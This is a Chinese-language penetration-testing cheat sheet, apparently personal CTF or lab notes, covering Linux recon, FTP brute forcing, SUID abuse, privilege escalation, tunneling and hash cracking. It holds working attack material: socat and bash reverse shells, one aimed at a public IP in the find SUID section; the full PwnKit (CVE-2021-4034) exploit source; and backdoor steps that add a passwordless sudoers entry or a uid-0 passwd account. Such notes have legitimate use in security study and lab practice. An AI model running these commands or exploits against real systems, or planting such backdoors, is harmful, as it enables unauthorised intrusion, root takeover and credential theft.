优化shell

1
python -c 'import pty; pty.spawn("/bin/bash")'
1
2
3
4
5
# 在攻击机监听
socat file:`tty`,raw,echo=0 tcp-listen:4444

# 在目标机反向连接
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.56.1:4444

信息搜集

进程

1
ps aux

监听端口

1
ss -lntp
1
ss -utnl
1
fscan -h 192.168.1.1/24
1
2

/proc/net/

smb

1
sudo nxc smb rebound.htb --shares

nmap

1
2
3
nmap 192.168.56.3 -p-

nmap 192.168.56.3 -p 22,80,2222 -sC -sV

nmap的扫描结果显示存在时间偏差,通常在红队进行攻击时,如果存在时间偏差,会导致利用kerberos票据或者ntlm的身份验证等依赖时间戳时,出现验证失败
所以看到这种情况,需要做时间同步

1
2
3
sudo ntpdate 10.129.232.31

sudo net time set -S 10.129.232.31

sudo权限命令查看

1
2
3
sudo -l

sudo -ll

历史命令

1
.bash_history

nfs共享目录

共享文件系统

查看共享了那些目录

1
showmount -e 192.168.57.3

mount挂载

1
mount -t nfs 192.168.57.3:/ /mnt/metasploitable2/

环境变量注入

LD_PRELOAD

编译

1
gcc -fPIC -shared -nostartfiles -o evil.so evil.c

端口利用

ftp 22

登录

anonymous

1
ftp 192.168.56.3

爆破密码

1
hydra -L user.txt -P pass.txt ftp://192.168.56.3

命令

1
2
3
4
5
6
7
pwd

ls

get

put ~/.ssh/id_rsa_maze.pub authorized_keys

mqtt 1883

‘#’代表订阅所有主题

1
mosquitto_sub -h 192.168.56.3 -t "#" -v

SUID利用

查找命令

1
2
3
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

bash

直接进入root交互

1
bash -p

find

指定一个文件然后执行任意命令

1
2
3
find /etc/passwd -exec whoami \;

find /etc/passwd -exec bash -c 'bash -i >& /dev/tcp/101.37.210.236/2333 0>&1' \;

nmap

早期nmap版本带有交互模式,因而允许用户执行shell命令,适用版本:nmap2.02至5.21

1
nmap --interactive

vim

如果以SUID运行,可以读取硬盘所有文件

执行命令

1
2
:!ls -la
:whoami

把命令执行结果粘贴在光标所在行

1
:read !ls -la

cp

覆盖系统文件,如果有suid权限可以查看其他用户文件

1
2
sudo -l
sudo -u arete /bin/cp /pwned/arete/flagz.txt /dev/stdout

nano

1
2
3
nano #进入nano编辑器
Ctrl + R
Ctrl + X

less、more

先指定文件查看,然后执行命令

1
2
3
less /etc/passwd

:!ls -la

awk

1
2
3
4
5
awk '{system("ls")}'
需要再换行才能执行命令结果

awk 'BEGIN {system("/bin/bash")}'
直接输出命令结果

pkexec

尝试CVE-2021-4034

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
/*
* Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability
* Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis
* <moo@arthepsy.eu> Advisory:
* https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shell = "#include <stdio.h>\n"
"#include <stdlib.h>\n"
"#include <unistd.h>\n\n"
"void gconv() {}\n"
"void gconv_init() {\n"
" setuid(0); setgid(0);\n"
" seteuid(0); setegid(0);\n"
" system(\"export "
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/"
"bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
" exit(0);\n"
"}";

int main(int argc, char *argv[]) {
FILE *fp;
system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x "
"'GCONV_PATH=./pwnkit'");
system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > "
"pwnkit/gconv-modules");
fp = fopen("pwnkit/pwnkit.c", "w");
fprintf(fp, "%s", shell);
fclose(fp);
system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
char *env[] = {"pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT",
"SHELL=pwnkit", NULL};
execve("/usr/bin/pkexec", (char *[]){NULL}, env);
}

提权

sudoers.d

用于配置sudo权限的文件夹,写入以下则player用户用sudo不用输入密码

但是由于sudoers.d文件夹下的文件所有者必须是root,所以此文件夹下的文件权限必须是0440或0640

1
2
echo 'player ALL=(ALL:ALL) NOPASSWD: ALL' > /etc/sudoers.d/player
chmod 0440 /etc/sudoers.d/player

/etc/passwd

1
hack:x:0:0::/root:/usr/bin/bash

隧道

ssh

前提需要知道ssh密码,本机执行后127.0.0.1:8888访问

1
ssh -L 8888:127.0.0.1:8080 gaoyan8764@192.168.56.3

socat

把 8080 端口的流量转发到 127.0.0.1:5000

1
socat TCP-LISTEN:8080,fork TCP:127.0.0.1:5000

爆破哈希

hashcat

1.看源码哈希加密来源

1
2
3
md5() 就是 0
md5(md5()) 就是 2600
md5(md5(md5())) 就是 3500

2.识别hash类型,会列出多个候选

1
2
3
hashcat --identify 7022cd14c42ff272619d6beacdc9ffde

输出有#、Name、Category三个字段,#是hash mode编号,Name为哈希算法名,Category模式所属大类

3.试hash mode,先跑字典攻击

1
2
3
echo '7022cd14c42ff272619d6beacdc9ffde' > hash.txt

hashcat -m 0 -a 0 hash.txt rockyou.txt

4.掩码爆破

1
2
3
4
5
6
7
8
9
10
11
?l:小写字母 a-z
?u:大写字母 A-Z
?d:数字 0-9
?s:特殊字符
?a:?l?u?d?s 的组合
?b:所有 0x00-0xff 字节

### 十六进制相关

?h:小写十六进制 0-9a-f
?H:大写十六进制 0-9A-F
1
2
3
4
5
8位数字爆破
hashcat -m 0 -a 3 hash.txt ?d?d?d?d?d?d?d?d

1至8位的密码都试y
hashcat -a 3 -m 0 hash.txt --increment --increment-min=1 --increment-max=8 ?a?a?a?a?a?a?a?a

查看

1
hashcat --show -m 0 hash.txt

类型

md5

1
hashcat -m 0 -a 3 hash.txt ?d?d?d?d?d?d?d?d

md5($pass + $salt)

1
2
3
4
结构:hashcat -m 10 '$pass:$' -a 3 --increment --increment-min=1 --increment-max=8 '?a?a?a?a?a?a?a?a'

例如:
hashcat -m 10 'd29d8d165f1110bca380a3b1ce020b29:40dfb7391c19a66939e6b6f4e9898804' -a 3 --increment --increment-min=1 --increment-max=8 '?a?a?a?a?a?a?a?a'

SSH passphrase

获取私钥

转换hash

1
python2 /usr/bin/ssh2john id_rsa > ssh_hash.txt 

爆破

1
john --format=SSH --wordlist=files/dictionary/rockyou.txt ssh_hash.txt